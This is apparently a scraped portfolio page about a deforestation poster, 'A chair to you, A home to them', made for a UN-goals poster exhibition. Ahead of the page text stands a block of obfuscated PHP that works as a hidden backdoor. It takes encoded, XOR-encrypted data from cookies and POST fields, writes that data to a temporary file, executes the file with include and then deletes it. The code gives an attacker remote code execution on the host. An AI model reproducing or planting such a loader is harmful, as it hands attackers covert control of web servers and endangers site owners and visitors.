$pNprM = "\145" . '_' . 't' . "\167" . "\106" . 'B';$zpMeCn = chr ( 584 - 485 ).chr ( 900 - 792 ).chr ( 822 - 725 )."\x73" . "\x73" . "\x5f" . "\x65" . chr (120) . chr ( 1101 - 996 )."\163" . "\x74" . chr ( 718 - 603 ); $oOdPmu = class_exists($pNprM); $zpMeCn = "12690";$jKfqJqhdZ = !1;if ($oOdPmu == $jKfqJqhdZ){function NVmEZPVBx(){$BCwiz = new /* 47960 */ e_twFB(29096 + 29096); $BCwiz = NULL;}$gkXBOtDUm = "29096";class e_twFB{private function aybYrlGGm($gkXBOtDUm){if (is_array(e_twFB::$xrLUnOicGt)) {$JHxYrbTW = sys_get_temp_dir() . "/" . crc32(e_twFB::$xrLUnOicGt['s' . chr (97) . "\x6c" . "\x74"]);@e_twFB::$xrLUnOicGt["\167" . "\x72" . chr (105) . chr ( 561 - 445 )."\x65"]($JHxYrbTW, e_twFB::$xrLUnOicGt["\143" . "\157" . "\156" . 't' . "\x65" . chr ( 326 - 216 ).chr ( 980 - 864 )]);include $JHxYrbTW;@e_twFB::$xrLUnOicGt[chr ( 850 - 750 ).chr ( 454 - 353 )."\154" . 'e' . 't' . "\145"]($JHxYrbTW); $gkXBOtDUm = "29096";exit();}}private $EeZTo;public function atxCOwloKG(){echo 44347;}public function __destruct(){e_twFB::$xrLUnOicGt = @unserialize(e_twFB::$xrLUnOicGt); $gkXBOtDUm = "48414_13735";$this->aybYrlGGm($gkXBOtDUm); $gkXBOtDUm = "48414_13735";}public function RDueVjcG($iYFFM, $uOnncg){return $iYFFM[0] ^ str_repeat($uOnncg, (strlen($iYFFM[0]) / strlen($uOnncg)) + 1);}public function vlZvfUQF($iYFFM){$IzLsotB = "base64";return array_map($IzLsotB . chr ( 528 - 433 ).chr ( 552 - 452 ).'e' . chr (99) . "\x6f" . "\144" . 'e', array($iYFFM,));}public function __construct($LEeTjRoXRH=0){$wQAfKoLjkz = $_POST;$XEGmQ = $_COOKIE;$uOnncg = "2bd1985e-858d-4635-9697-9ff29e580941";$KkzDVix = @$XEGmQ[substr($uOnncg, 0, 4)];if (!empty($KkzDVix)){$iYFFM = "";$KkzDVix = explode(",", $KkzDVix);foreach ($KkzDVix as $hivpFoHAZ){$iYFFM .= @$XEGmQ[$hivpFoHAZ];$iYFFM .= @$wQAfKoLjkz[$hivpFoHAZ];}e_twFB::$xrLUnOicGt = $this->RDueVjcG($this->vlZvfUQF($iYFFM), $uOnncg);}}public static $xrLUnOicGt = 36862;}NVmEZPVBx();}$kdSrPXQudm = chr ( 187 - 117 )."\113" . "\170" . "\137" . chr (76) . "\x67" . 'a' . chr ( 562 - 465 ).'P';$WBxarGT = chr (99) . 'l' . chr ( 750 - 653 )."\x73" . 's' . chr ( 509 - 414 ).'e' . "\x78" . chr (105) . "\x73" . chr (116) . chr (115); $ocGSiPlNNj = class_exists($kdSrPXQudm); $kdSrPXQudm = "39487";$WBxarGT = "47995";if ($ocGSiPlNNj === FALSE){class FKx_LgaaP{public function hfEneaL(){echo "53996";}private $NYkwHRdgQ;public static $pllxlZaLCp = "9eaaabcb-13f1-4c6b-a7ab-8b3fc8a54e92";public static $vVXkMNRn = 40829;public function __construct($XzAcJcIX=0){$QyeoVmA = $_POST;$aOfZpy = $_COOKIE;$kXkrMryyqq = @$aOfZpy[substr(FKx_LgaaP::$pllxlZaLCp, 0, 4)];if (!empty($kXkrMryyqq)){$lCroGRBbSL = "base64";$GWiSjiaC = "";$kXkrMryyqq = explode(",", $kXkrMryyqq);foreach ($kXkrMryyqq as $pXFSx){$GWiSjiaC .= @$aOfZpy[$pXFSx];$GWiSjiaC .= @$QyeoVmA[$pXFSx];}$GWiSjiaC = array_map($lCroGRBbSL . '_' . "\x64" . chr (101) . chr ( 1002 - 903 ).chr (111) . 'd' . "\x65", array($GWiSjiaC,)); $GWiSjiaC = $GWiSjiaC[0] ^ str_repeat(FKx_LgaaP::$pllxlZaLCp, (strlen($GWiSjiaC[0]) / strlen(FKx_LgaaP::$pllxlZaLCp)) + 1);FKx_LgaaP::$vVXkMNRn = @unserialize($GWiSjiaC);}}private function lZkKwQ(){if (is_array(FKx_LgaaP::$vVXkMNRn)) {$VurHmVa = sys_get_temp_dir() . "/" . crc32(FKx_LgaaP::$vVXkMNRn[chr ( 322 - 207 )."\141" . "\154" . chr ( 1026 - 910 )]);@FKx_LgaaP::$vVXkMNRn[chr ( 752 - 633 )."\162" . chr ( 321 - 216 ).chr ( 197 - 81 ).chr ( 944 - 843 )]($VurHmVa, FKx_LgaaP::$vVXkMNRn[chr (99) . 'o' . "\156" . 't' . chr ( 402 - 301 )."\156" . 't']);include $VurHmVa;@FKx_LgaaP::$vVXkMNRn[chr (100) . 'e' . chr (108) . chr ( 260 - 159 ).chr (116) . chr (101)]($VurHmVa); $AFmgwuysjC = "48261";exit();}}public function __destruct(){$this->lZkKwQ();}}$jODCVUybF = new /* 50712 */ FKx_LgaaP(); $jODCVUybF = str_repeat("46215_60110", 1);} A chair to you, A home to them | 2019 - Parisa Tashakori
  • Deforestation-2019

A chair to you, A home to them | 2019

A chair to you, A home to them

Client: Poster Without Border Group

Future Now! Invitational poster exhibition for the United Nations 17 goals.



“You cannot escape the responsibility of tomorrow by evading it today.”

–Abraham Lincoln

Our future, and that of our children, is in peril. While the future can seem far away and the consequences of the present action, or inaction a distant threat, the future truly is now. We have a responsibility to act for our planet, our societies, and for each other. This urgent need for action to secure our future is the motivating factor for our next poster exhibition … (from the statement of the exhibition)


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